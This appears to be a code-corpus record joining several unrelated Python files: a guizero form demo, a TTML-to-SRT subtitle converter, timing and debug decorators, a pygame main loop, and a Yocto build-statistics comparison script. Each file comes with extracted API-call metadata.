'show_times', (['x2'], {}), '(x2)\n', (10007, 10011), False, 'from slogdata import mysql_socket, show_times\n'), ((10067, 10091), 'json.loads', 'json.loads', (['x2.record[0]'], {}), '(x2.record[0])\n', (10077, 10091), False, 'import json\n'), ((10130, 10146), 'json.loads', 'json.loads', (['body'], {}), '(body)\n', (10140, 10146), False, 'import json\n'), ((2140, 2188), 'pandas.read_sql', 'pd.read_sql', (['f"""select count(*) from {table}"""', 'db'], {}), "(f'select count(*) from {table}', db)\n", (2151, 2188), True, 'import pandas as pd\n'), ((2231, 2280), 'pandas.read_sql', 'pd.read_sql', (['f"""select * from {table} limit 5"""', 'db'], {}), "(f'select * from {table} limit 5', db)\n", (2242, 2280), True, 'import pandas as pd\n'), ((1100, 1137), 'slogdata.mysql_socket', 'mysql_socket', (['database', 'create_engine'], {}), '(database, create_engine)\n', (1112, 1137), False, 'from slogdata import mysql_socket, show_times\n'), ((1306, 1404), 'pandas.read_sql', 'pd.read_sql', (['"""\nselect *\nfrom slog_run\nwhere parent = \'Provalidator\'\nlimit 10\n"""', '_db4'], {}), '(\n """\nselect *\nfrom slog_run\nwhere parent = \'Provalidator\'\nlimit 10\n""", _db4\n )\n', (1317, 1404), True, 'import pandas as pd\n'), ((9041, 9055), 'slogdata.show_times', 'show_times', (['x1'], {}), '(x1)\n', (9051, 9055), False, 'from slogdata import mysql_socket, show_times\n'), ((9909, 9923), 'slogdata.show_times', 'show_times', (['x2'], {}), '(x2)\n', (9919, 9923), False, 'from slogdata import mysql_socket, show_times\n'), ((9350, 9365), 'json.loads', 'json.loads', (['txt'], {}), '(txt)\n', (9360, 9365), False, 'import json\n'), ((9617, 9630), 'json.loads', 'json.loads', (['v'], {}), '(v)\n', (9627, 9630), False, 'import json\n')]
|
from guizero import App, Text, TextBox, Combo, PushButton, Box
app = App()
Text(app, text="My form")
form = Box(app, width="fill", layout="grid")
form.border = True
Text(form, text="Title", grid=[0,0], align="right")
TextBox(form, grid=[1,0])
Text(form, text="Name", grid=[0,1], align="right")
TextBox(form, grid=[1,1])
Text(form, text="Age", grid=[0,2], align="right")
TextBox(form, grid=[1,2])
buttons = Box(app, width="fill", align="bottom")
PushButton(buttons, text="Ok", align="left")
PushButton(buttons, text="Cancel", align="left")
app.display()
|
[
"guizero.App",
"guizero.TextBox",
"guizero.PushButton",
"guizero.Box",
"guizero.Text"
] |
[((70, 75), 'guizero.App', 'App', ([], {}), '()\n', (73, 75), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((77, 102), 'guizero.Text', 'Text', (['app'], {'text': '"""My form"""'}), "(app, text='My form')\n", (81, 102), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((111, 148), 'guizero.Box', 'Box', (['app'], {'width': '"""fill"""', 'layout': '"""grid"""'}), "(app, width='fill', layout='grid')\n", (114, 148), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((169, 221), 'guizero.Text', 'Text', (['form'], {'text': '"""Title"""', 'grid': '[0, 0]', 'align': '"""right"""'}), "(form, text='Title', grid=[0, 0], align='right')\n", (173, 221), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((221, 247), 'guizero.TextBox', 'TextBox', (['form'], {'grid': '[1, 0]'}), '(form, grid=[1, 0])\n', (228, 247), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((248, 299), 'guizero.Text', 'Text', (['form'], {'text': '"""Name"""', 'grid': '[0, 1]', 'align': '"""right"""'}), "(form, text='Name', grid=[0, 1], align='right')\n", (252, 299), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((299, 325), 'guizero.TextBox', 'TextBox', (['form'], {'grid': '[1, 1]'}), '(form, grid=[1, 1])\n', (306, 325), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((326, 376), 'guizero.Text', 'Text', (['form'], {'text': '"""Age"""', 'grid': '[0, 2]', 'align': '"""right"""'}), "(form, text='Age', grid=[0, 2], align='right')\n", (330, 376), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((376, 402), 'guizero.TextBox', 'TextBox', (['form'], {'grid': '[1, 2]'}), '(form, grid=[1, 2])\n', (383, 402), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((413, 451), 'guizero.Box', 'Box', (['app'], {'width': '"""fill"""', 'align': '"""bottom"""'}), "(app, width='fill', align='bottom')\n", (416, 451), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((453, 497), 'guizero.PushButton', 'PushButton', (['buttons'], {'text': '"""Ok"""', 'align': '"""left"""'}), "(buttons, text='Ok', align='left')\n", (463, 497), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n'), ((498, 546), 'guizero.PushButton', 'PushButton', (['buttons'], {'text': '"""Cancel"""', 'align': '"""left"""'}), "(buttons, text='Cancel', align='left')\n", (508, 546), False, 'from guizero import App, Text, TextBox, Combo, PushButton, Box\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2017 <NAME>
# See https://github.com/codingcatgirl/ttml2srt
#
# MIT License
#
# Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import io
from datetime import timedelta
from defusedxml import ElementTree as ET
def ttml2srt( infile, outfile ):
tree = ET.parse( infile )
root = tree.getroot()
# strip namespaces
    for elem in root.iter():
elem.tag = elem.tag.split('}', 1)[-1]
elem.attrib = {name.split('}', 1)
[-1]: value for name, value in elem.attrib.items()}
# get styles
styles = {}
for elem in root.findall('./head/styling/style'):
style = {}
if 'color' in elem.attrib:
color = elem.attrib['color']
if color not in ('#FFFFFF', '#000000'):
style['color'] = color
if 'fontStyle' in elem.attrib:
fontstyle = elem.attrib['fontStyle']
if fontstyle in ('italic', ):
style['fontstyle'] = fontstyle
styles[elem.attrib['id']] = style
body = root.find('./body')
# parse correct start and end times
def parse_time_expression(expression, default_offset=timedelta(0)):
offset_time = re.match(r'^([0-9]+(\.[0-9]+)?)(h|m|s|ms|f|t)$', expression)
if offset_time:
time_value, _, metric = offset_time.groups()
time_value = float(time_value)
if metric == 'h':
return default_offset + timedelta(hours=time_value)
elif metric == 'm':
return default_offset + timedelta(minutes=time_value)
elif metric == 's':
return default_offset + timedelta(seconds=time_value)
elif metric == 'ms':
return default_offset + timedelta(milliseconds=time_value)
elif metric == 'f':
raise NotImplementedError(
'Parsing time expressions by frame is not supported!')
elif metric == 't':
raise NotImplementedError(
'Parsing time expressions by ticks is not supported!')
clock_time = re.match(
r'^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\.[0-9]+)?)$', expression)
if clock_time:
hours, minutes, seconds, _ = clock_time.groups()
return timedelta(hours=int(hours), minutes=int(minutes), seconds=float(seconds))
clock_time_frames = re.match(
r'^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\.[0-9]+)?)$', expression)
if clock_time_frames:
raise NotImplementedError(
'Parsing time expressions by frame is not supported!')
raise ValueError('unknown time expression: %s' % expression)
def parse_times(elem, default_begin=timedelta(0)):
if 'begin' in elem.attrib:
begin = parse_time_expression(
elem.attrib['begin'], default_offset=default_begin)
else:
begin = default_begin
elem.attrib['{abs}begin'] = begin
end = None
if 'end' in elem.attrib:
end = parse_time_expression(
elem.attrib['end'], default_offset=default_begin)
dur = None
if 'dur' in elem.attrib:
dur = parse_time_expression(elem.attrib['dur'])
if dur is not None:
if end is None:
end = begin + dur
else:
end = min(end, begin + dur)
elem.attrib['{abs}end'] = end
for child in elem:
parse_times(child, default_begin=begin)
parse_times(body)
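    # collect every distinct begin/end instant; the rendered text can only change at these points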
timestamps = set()
for elem in body.findall('.//*[@{abs}begin]'):
timestamps.add(elem.attrib['{abs}begin'])
for elem in body.findall('.//*[@{abs}end]'):
timestamps.add(elem.attrib['{abs}end'])
timestamps.discard(None)
# render subtitles on each timestamp
def render_subtitles(elem, timestamp, parent_style=None):
if timestamp < elem.attrib['{abs}begin']:
return ''
if elem.attrib['{abs}end'] is not None and timestamp >= elem.attrib['{abs}end']:
return ''
result = ''
style = parent_style.copy() if parent_style is not None else {}
if 'style' in elem.attrib:
style.update(styles[elem.attrib['style']])
if 'color' in style:
result += '<font color="%s">' % style['color']
if style.get('fontstyle') == 'italic':
result += '<i>'
if elem.text:
result += elem.text.strip()
if len(elem):
for child in elem:
result += render_subtitles(child, timestamp)
if child.tail:
result += child.tail.strip()
        # close tags in reverse order of opening so they nest correctly
        if style.get('fontstyle') == 'italic':
            result += '</i>'
        if 'color' in style:
            result += '</font>'
if elem.tag in ('div', 'p', 'br'):
result += '\n'
return result
rendered = []
for timestamp in sorted(timestamps):
rendered.append((timestamp, re.sub(r'\n\n\n+', '\n\n',
render_subtitles(body, timestamp)).strip()))
    if not rendered:
        return  # nothing was rendered, so there is nothing to write
# group timestamps together if nothing changes
rendered_grouped = []
last_text = None
for timestamp, content in rendered:
if content != last_text:
rendered_grouped.append((timestamp, content))
last_text = content
# output srt
rendered_grouped.append((rendered_grouped[-1][0] + timedelta(hours=24), ''))
def format_timestamp(timestamp):
        # %06.3f zero-pads the seconds field (e.g. 05.123), as SRT requires
        return ('%02d:%02d:%06.3f' % (timestamp.total_seconds() // 3600,
                                       timestamp.total_seconds() // 60 % 60,
                                       timestamp.total_seconds() % 60)).replace('.', ',')
    if isinstance(outfile, str):  # Python 3: str covers the old unicode type
        file = io.open(outfile, 'w', encoding='utf-8')
else:
file = outfile
srt_i = 1
for i, (timestamp, content) in enumerate(rendered_grouped[:-1]):
if content == '':
continue
        # the file is opened in text mode, so write str, not bytearray
        file.write('%d\n' % srt_i)
        file.write(
            format_timestamp(timestamp) +
            ' --> ' +
            format_timestamp(rendered_grouped[i + 1][0]) +
            '\n'
        )
        file.write(content + '\n\n')
srt_i += 1
file.close()
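# Minimal usage sketch (file names are hypothetical). Note that the function
# closes whatever file object it ends up writing to:
#   ttml2srt('captions.ttml', 'captions.srt')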
|
[
"datetime.timedelta",
"re.match",
"defusedxml.ElementTree.parse",
"io.open"
] |
[((1334, 1350), 'defusedxml.ElementTree.parse', 'ET.parse', (['infile'], {}), '(infile)\n', (1342, 1350), True, 'from defusedxml import ElementTree as ET\n'), ((2084, 2096), 'datetime.timedelta', 'timedelta', (['(0)'], {}), '(0)\n', (2093, 2096), False, 'from datetime import timedelta\n'), ((2115, 2175), 're.match', 're.match', (['"""^([0-9]+(\\\\.[0-9]+)?)(h|m|s|ms|f|t)$"""', 'expression'], {}), "('^([0-9]+(\\\\.[0-9]+)?)(h|m|s|ms|f|t)$', expression)\n", (2123, 2175), False, 'import re\n'), ((2846, 2919), 're.match', 're.match', (['"""^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$"""', 'expression'], {}), "('^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$', expression)\n", (2854, 2919), False, 'import re\n'), ((3100, 3189), 're.match', 're.match', (['"""^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$"""', 'expression'], {}), "('^([0-9]{2,}):([0-9]{2,}):([0-9]{2,}):([0-9]{2,}(\\\\.[0-9]+)?)$',\n expression)\n", (3108, 3189), False, 'import re\n'), ((3406, 3418), 'datetime.timedelta', 'timedelta', (['(0)'], {}), '(0)\n', (3415, 3418), False, 'from datetime import timedelta\n'), ((5998, 6037), 'io.open', 'io.open', (['outfile', '"""w"""'], {'encoding': '"""utf-8"""'}), "(outfile, 'w', encoding='utf-8')\n", (6005, 6037), False, 'import io\n'), ((5685, 5704), 'datetime.timedelta', 'timedelta', ([], {'hours': '(24)'}), '(hours=24)\n', (5694, 5704), False, 'from datetime import timedelta\n'), ((2325, 2352), 'datetime.timedelta', 'timedelta', ([], {'hours': 'time_value'}), '(hours=time_value)\n', (2334, 2352), False, 'from datetime import timedelta\n'), ((2404, 2433), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'time_value'}), '(minutes=time_value)\n', (2413, 2433), False, 'from datetime import timedelta\n'), ((2485, 2514), 'datetime.timedelta', 'timedelta', ([], {'seconds': 'time_value'}), '(seconds=time_value)\n', (2494, 2514), False, 'from datetime import timedelta\n'), ((2567, 2601), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': 'time_value'}), '(milliseconds=time_value)\n', (2576, 2601), False, 'from datetime import timedelta\n')]
|
# file: timer_decor.py
import time
class timer:
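    # Decorator implemented as a class: wraps a function, times each call,
    # and accumulates the total elapsed time across calls in self.alltime.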
def __init__(self, func):
self.func = func
self.alltime = 0
def __call__(self, *args, **kwargs):
start = time.time()
result = self.func(*args, **kwargs)
elapsed = time.time() - start
self.alltime += elapsed
# print('%s: %.5f, %.5f' % (self.func.__name__, elapsed, self.alltime))
print('{0}: {1:.5f}, {2:.5f}'.format(self.func.__name__, elapsed, self.alltime))
return result
@timer
def listcomp(N):
return [x * 2 for x in range(N)]
@timer
def mapcall(N):
return map((lambda x: x * 2), range(N))
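# Note: on Python 3, map() returns a lazy iterator, so mapcall's timings
# measure little more than iterator creation; the doubling work would only
# run if the result were consumed (e.g. wrapped in list()).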
result = listcomp(5)
listcomp(50000)
listcomp(500000)
listcomp(1000000)
print(result)
print('allTime = {0}'.format(listcomp.alltime))
print('')
result = mapcall(5)
mapcall(50000)
mapcall(500000)
mapcall(1000000)
print(result)
print('allTime = {0}'.format(mapcall.alltime))
print('map/comp = {0}'.format(round(mapcall.alltime / listcomp.alltime, 3)))
|
[
"time.time"
] |
[((187, 198), 'time.time', 'time.time', ([], {}), '()\n', (196, 198), False, 'import time\n'), ((261, 272), 'time.time', 'time.time', ([], {}), '()\n', (270, 272), False, 'import time\n')]
|
import sys
import pygame
from pygame.locals import *
import moyu_engine.config.data.constants as C
import moyu_engine.config.system.assets_system
import moyu_engine.config.system.tilemap_system
import moyu_engine.config.system.move_system
import moyu_engine.config.window.main_window
def init():
pygame.init()
pygame.mixer.init()
SCREEN = pygame.display.set_mode(C.window['size'],pygame.RESIZABLE)
SCREEN_TITLE = pygame.display.set_caption(C.window['title'])
#pygame.display.set_icon(G.tl16)
CLOCK = pygame.time.Clock()
pygame.display.flip()
moyu_engine.config.system.assets_system.AssetsSystem.loader()
moyu_engine.config.system.tilemap_system.TilemapSystem.builder()
while True:
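        # Main loop: advance game state, redraw the window, then drain events.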
moyu_engine.config.system.move_system.MoveSystem.move()
moyu_engine.config.window.main_window.MainWindow.blit()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
CLOCK.tick(C.window['fps'])
def run():
init()
if __name__ == "__main__":
pass
|
[
"pygame.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.mixer.init",
"pygame.init",
"pygame.display.flip",
"pygame.display.update",
"pygame.display.set_caption",
"pygame.time.Clock",
"sys.exit"
] |
[((308, 321), 'pygame.init', 'pygame.init', ([], {}), '()\n', (319, 321), False, 'import pygame\n'), ((326, 345), 'pygame.mixer.init', 'pygame.mixer.init', ([], {}), '()\n', (343, 345), False, 'import pygame\n'), ((366, 425), 'pygame.display.set_mode', 'pygame.display.set_mode', (["C.window['size']", 'pygame.RESIZABLE'], {}), "(C.window['size'], pygame.RESIZABLE)\n", (389, 425), False, 'import pygame\n'), ((444, 489), 'pygame.display.set_caption', 'pygame.display.set_caption', (["C.window['title']"], {}), "(C.window['title'])\n", (470, 489), False, 'import pygame\n'), ((539, 558), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (556, 558), False, 'import pygame\n'), ((563, 584), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (582, 584), False, 'import pygame\n'), ((894, 912), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (910, 912), False, 'import pygame\n'), ((1015, 1038), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (1036, 1038), False, 'import pygame\n'), ((965, 978), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (976, 978), False, 'import pygame\n'), ((995, 1005), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1003, 1005), False, 'import sys\n')]
|
import inspect
import logging
import time
from functools import wraps
logger = logging.getLogger(__name__)
def benchmark(method):
"""The following decorator aims at calculating the decorated function's
execution time and is used to benchmark our various approaches and assist
us in coming up with a comprehensive comparison of their efficiency.
"""
@wraps(method)
def wrapper(*args, **kwargs):
beg = time.time()
rv = method(*args, **kwargs)
end = time.time()
logger.info("%s returned after %7.3f seconds", method.__name__, end - beg)
return rv
return wrapper
def debug(method):
"""The following decorator serves at emitting details regarding the decorated
function's calls.
In more detai, the information emitted is:
- The function's name.
- Its positional and keyword arguements for the function call at hand.
- Any exception that the function `raises`.
In addition to that, the `debug` decorator passes a special boolean keyword arguement
by the name `debug`, if and only if it is included in the function signature.
You can then utilize this arguement inside the decorated function and emit additional
information.
"""
signature = inspect.signature(method)
defaults = {
k: v.default
for k, v in signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
@wraps(method)
def wrapper(*args, **kwargs):
called_with = ""
if args:
called_with += ", ".join(str(x) for x in args)
called_with += ", "
called_with += ", ".join(
f"{x}={kwargs.get(x, defaults[x])}" for x in defaults.keys()
)
try:
rv = method(*args, **kwargs)
except Exception as e:
logger.debug(f"%s(%s) raised %s", method.__name__, called_with, e)
raise
logger.debug(f"%s(%s) returned %s", method.__name__, called_with, rv)
return rv
return wrapper
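# A hypothetical usage sketch combining both decorators (names are illustrative);
# configure logging first so the debug output is visible:
#   logging.basicConfig(level=logging.DEBUG)
#   @debug
#   @benchmark
#   def crunch(n, debug=False):
#       return sum(range(n))
#   crunch(100000, debug=True)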
|
[
"inspect.signature",
"functools.wraps",
"logging.getLogger",
"time.time"
] |
[((80, 107), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (97, 107), False, 'import logging\n'), ((374, 387), 'functools.wraps', 'wraps', (['method'], {}), '(method)\n', (379, 387), False, 'from functools import wraps\n'), ((1273, 1298), 'inspect.signature', 'inspect.signature', (['method'], {}), '(method)\n', (1290, 1298), False, 'import inspect\n'), ((1451, 1464), 'functools.wraps', 'wraps', (['method'], {}), '(method)\n', (1456, 1464), False, 'from functools import wraps\n'), ((436, 447), 'time.time', 'time.time', ([], {}), '()\n', (445, 447), False, 'import time\n'), ((499, 510), 'time.time', 'time.time', ([], {}), '()\n', (508, 510), False, 'import time\n')]
|
#! /usr/bin/env python3
#
# Copyright 2019 Garmin Ltd. or its subsidiaries
#
# SPDX-License-Identifier: Apache-2.0
import os
import sys
import glob
import re
from scipy import stats
import numpy
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(THIS_DIR, 'poky', 'scripts', 'lib'))
from buildstats import BuildStats, diff_buildstats, taskdiff_fields, BSVerDiff
ICECREAM_TASKS = ('do_compile', 'do_compile_kernelmodules', 'do_configure', 'do_install')
VALUES = ('cputime', 'walltime')
def sum_task_totals(bs):
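    # Maps (task-name-or-'other'/'overall', 'cputime'|'walltime') keys to
    # values summed across every recipe in the buildstats.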
d = {}
for recipe_data in bs.values():
for name, bs_task in recipe_data.tasks.items():
for val_type in VALUES:
val = getattr(bs_task, val_type)
key = (name, val_type)
if name not in ICECREAM_TASKS:
key = ('other', val_type)
d.setdefault(key, 0)
d[key] += val
key = ('overall', val_type)
d.setdefault(key, 0)
d[key] += val
return d
def get_elapsed(p):
elapsed = None
cpu = None
with open(os.path.join(p, 'build_stats'), 'r') as f:
for l in f:
m = re.match(r'Elapsed time: (?P<elapsed>[\d.]+) ', l)
if m is not None:
elapsed = float(m.group('elapsed'))
continue
m = re.match(r'CPU usage: (?P<cpu>[\d.]+)%', l)
if m is not None:
cpu = float(m.group('cpu')) / 100
if elapsed is None:
raise Exception('Elapsed time not found for %s' % p)
if cpu is None:
raise Exception('CPU usage not found for %s' % p)
return (elapsed, cpu)
def pooled_stdev(a_std_dev, b_std_dev):
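    # Pooled standard deviation of two equal-sized samples:
    # sqrt((s_a^2 + s_b^2) / 2).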
return numpy.sqrt((a_std_dev**2 + b_std_dev**2)/2)
def write_elapsed():
with open(os.path.join(THIS_DIR, 'stats', 'elapsed.csv'), 'w') as f:
f.write('Build,Elapsed without Icecream,Elapsed with Icecream,CPU usage without Icecream,CPU usage with Icecream\n')
elapsed_combined_without = []
elapsed_combined_with = []
cpu_combined_without = []
cpu_combined_with = []
for p in glob.glob(os.path.join(THIS_DIR, 'stats', 'build*')):
without_elapsed, without_cpu = get_elapsed(os.path.join(p, 'without-icecream'))
with_elapsed, with_cpu = get_elapsed(os.path.join(p, 'with-icecream'))
elapsed_combined_without.append(without_elapsed)
elapsed_combined_with.append(with_elapsed)
cpu_combined_without.append(without_cpu)
cpu_combined_with.append(with_cpu)
f.write('%s,%f,%f,%f,%f\n' % (os.path.basename(p), without_elapsed, with_elapsed,
without_cpu, with_cpu))
f.write('\n')
f.write(',Average without Icecream (s),Without Icecream std dev,Average with Icecream (s),With Icecream std dev,p-value,Percent Change,Percent Change std dev\n')
average_without = numpy.average(elapsed_combined_without)
average_with = numpy.average(elapsed_combined_with)
without_std_dev = numpy.std(elapsed_combined_without)
with_std_dev = numpy.std(elapsed_combined_with)
change = (average_with - average_without) / average_without
pooled_std_dev = pooled_stdev(without_std_dev, with_std_dev) / average_without
_, p = stats.ttest_rel(elapsed_combined_without, elapsed_combined_with)
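        # paired t-test: each build directory yields one with/without pair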
f.write('Elapsed Time,%f,%f,%f,%f,%e,%.2f,%f\n' % (
average_without, without_std_dev,
average_with, with_std_dev, p,
change, pooled_std_dev))
f.write('\n')
f.write(',Average without Icecream,Without Icecream std dev,Average with Icecream,With Icecream std dev,p-value,Delta\n')
average_without = numpy.average(cpu_combined_without)
average_with = numpy.average(cpu_combined_with)
without_std_dev = numpy.std(cpu_combined_without)
with_std_dev = numpy.std(cpu_combined_with)
delta = average_with - average_without
_, p = stats.ttest_rel(cpu_combined_without, cpu_combined_with)
f.write('CPU Usage,%f,%f,%f,%f,%e,%.2f\n' % (
average_without, without_std_dev,
average_with, with_std_dev, p,
delta))
def write_tasks():
with open(os.path.join(THIS_DIR, 'stats', 'raw.csv'), 'w') as f:
combined_with = {}
combined_without = {}
f.write('Task,Attribute,Build,Without Icecream,With Icecream\n')
for p in glob.glob(os.path.join(THIS_DIR, 'stats', 'build*')):
without_stats = BuildStats.from_dir(os.path.join(p, 'without-icecream'))
with_stats = BuildStats.from_dir(os.path.join(p, 'with-icecream'))
without_d = sum_task_totals(without_stats)
with_d = sum_task_totals(with_stats)
for k in without_d.keys():
without_val = without_d[k]
with_val = with_d[k]
f.write("%s,%s,%s,%f,%f\n" % (k[0], k[1], os.path.basename(p), without_val, with_val))
combined_with.setdefault(k, []).append(with_val)
combined_without.setdefault(k, []).append(without_val)
with open(os.path.join(THIS_DIR, 'stats', 'totals.csv'), 'w') as f:
f.write('Task,Attribute,Without Icecream,Without Std dev,With Icecream,With Std dev,p-value,Percent Change,Percent Change Std Dev\n')
for k in combined_without.keys():
without_avg = numpy.average(combined_without[k])
with_avg = numpy.average(combined_with[k])
without_std_dev = numpy.std(combined_without[k])
with_std_dev = numpy.std(combined_with[k])
change = (with_avg - without_avg) / without_avg
pooled_std_dev = pooled_stdev(without_std_dev, with_std_dev) / without_avg
_, p = stats.ttest_rel(combined_without[k], combined_with[k])
f.write("%s,%s,%f,%f,%f,%f,%e,%.2f,%f\n" % (k[0], k[1], without_avg, without_std_dev, with_avg, with_std_dev, p, change, pooled_std_dev))
def main():
write_tasks()
write_elapsed()
if __name__ == "__main__":
main()
# exit on any error and unset variables
#set -u -e -o pipefail
#THIS_DIR="$(readlink -f $(dirname $0))"
#
#TASKS="do_configure do_compile do_install do_package_write_rpm"
#ATTRS="cputime walltime"
#
#echo "Task,Attribute,Build,Without Icecream,With Icecream" > $THIS_DIR/stats/stat.csv
#
#for d in $THIS_DIR/stats/build*; do
# for task in $TASKS; do
# for attr in $ATTRS; do
# VAL="$($THIS_DIR/poky/scripts/buildstats-diff --only-task $task --diff-attr $attr $d/without-icecream $d/with-icecream | tail -1)"
# echo "$task,$attr,$d,$(echo $VAL | sed 's/.*(\([0-9.]\+\)s).*(\([0-9.]\+\)s).*/\1,\2/g')" >> $THIS_DIR/stats/stat.csv
# done
# done
#done
|
[
"numpy.average",
"os.path.basename",
"numpy.std",
"scipy.stats.ttest_rel",
"os.path.realpath",
"re.match",
"os.path.join",
"numpy.sqrt"
] |
[((224, 250), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (240, 250), False, 'import os\n'), ((268, 316), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""poky"""', '"""scripts"""', '"""lib"""'], {}), "(THIS_DIR, 'poky', 'scripts', 'lib')\n", (280, 316), False, 'import os\n'), ((1754, 1803), 'numpy.sqrt', 'numpy.sqrt', (['((a_std_dev ** 2 + b_std_dev ** 2) / 2)'], {}), '((a_std_dev ** 2 + b_std_dev ** 2) / 2)\n', (1764, 1803), False, 'import numpy\n'), ((3007, 3046), 'numpy.average', 'numpy.average', (['elapsed_combined_without'], {}), '(elapsed_combined_without)\n', (3020, 3046), False, 'import numpy\n'), ((3070, 3106), 'numpy.average', 'numpy.average', (['elapsed_combined_with'], {}), '(elapsed_combined_with)\n', (3083, 3106), False, 'import numpy\n'), ((3133, 3168), 'numpy.std', 'numpy.std', (['elapsed_combined_without'], {}), '(elapsed_combined_without)\n', (3142, 3168), False, 'import numpy\n'), ((3192, 3224), 'numpy.std', 'numpy.std', (['elapsed_combined_with'], {}), '(elapsed_combined_with)\n', (3201, 3224), False, 'import numpy\n'), ((3395, 3459), 'scipy.stats.ttest_rel', 'stats.ttest_rel', (['elapsed_combined_without', 'elapsed_combined_with'], {}), '(elapsed_combined_without, elapsed_combined_with)\n', (3410, 3459), False, 'from scipy import stats\n'), ((3825, 3860), 'numpy.average', 'numpy.average', (['cpu_combined_without'], {}), '(cpu_combined_without)\n', (3838, 3860), False, 'import numpy\n'), ((3884, 3916), 'numpy.average', 'numpy.average', (['cpu_combined_with'], {}), '(cpu_combined_with)\n', (3897, 3916), False, 'import numpy\n'), ((3943, 3974), 'numpy.std', 'numpy.std', (['cpu_combined_without'], {}), '(cpu_combined_without)\n', (3952, 3974), False, 'import numpy\n'), ((3998, 4026), 'numpy.std', 'numpy.std', (['cpu_combined_with'], {}), '(cpu_combined_with)\n', (4007, 4026), False, 'import numpy\n'), ((4089, 4145), 'scipy.stats.ttest_rel', 'stats.ttest_rel', (['cpu_combined_without', 'cpu_combined_with'], {}), '(cpu_combined_without, cpu_combined_with)\n', (4104, 4145), False, 'from scipy import stats\n'), ((1132, 1162), 'os.path.join', 'os.path.join', (['p', '"""build_stats"""'], {}), "(p, 'build_stats')\n", (1144, 1162), False, 'import os\n'), ((1211, 1261), 're.match', 're.match', (['"""Elapsed time: (?P<elapsed>[\\\\d.]+) """', 'l'], {}), "('Elapsed time: (?P<elapsed>[\\\\d.]+) ', l)\n", (1219, 1261), False, 'import re\n'), ((1386, 1429), 're.match', 're.match', (['"""CPU usage: (?P<cpu>[\\\\d.]+)%"""', 'l'], {}), "('CPU usage: (?P<cpu>[\\\\d.]+)%', l)\n", (1394, 1429), False, 'import re\n'), ((1834, 1880), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""elapsed.csv"""'], {}), "(THIS_DIR, 'stats', 'elapsed.csv')\n", (1846, 1880), False, 'import os\n'), ((2184, 2225), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""build*"""'], {}), "(THIS_DIR, 'stats', 'build*')\n", (2196, 2225), False, 'import os\n'), ((4343, 4385), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""raw.csv"""'], {}), "(THIS_DIR, 'stats', 'raw.csv')\n", (4355, 4385), False, 'import os\n'), ((4555, 4596), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""build*"""'], {}), "(THIS_DIR, 'stats', 'build*')\n", (4567, 4596), False, 'import os\n'), ((5243, 5288), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""stats"""', '"""totals.csv"""'], {}), "(THIS_DIR, 'stats', 'totals.csv')\n", (5255, 5288), False, 'import os\n'), ((5511, 5545), 'numpy.average', 'numpy.average', (['combined_without[k]'], {}), '(combined_without[k])\n', (5524, 5545), False, 'import numpy\n'), ((5569, 5600), 'numpy.average', 'numpy.average', (['combined_with[k]'], {}), '(combined_with[k])\n', (5582, 5600), False, 'import numpy\n'), ((5631, 5661), 'numpy.std', 'numpy.std', (['combined_without[k]'], {}), '(combined_without[k])\n', (5640, 5661), False, 'import numpy\n'), ((5689, 5716), 'numpy.std', 'numpy.std', (['combined_with[k]'], {}), '(combined_with[k])\n', (5698, 5716), False, 'import numpy\n'), ((5883, 5937), 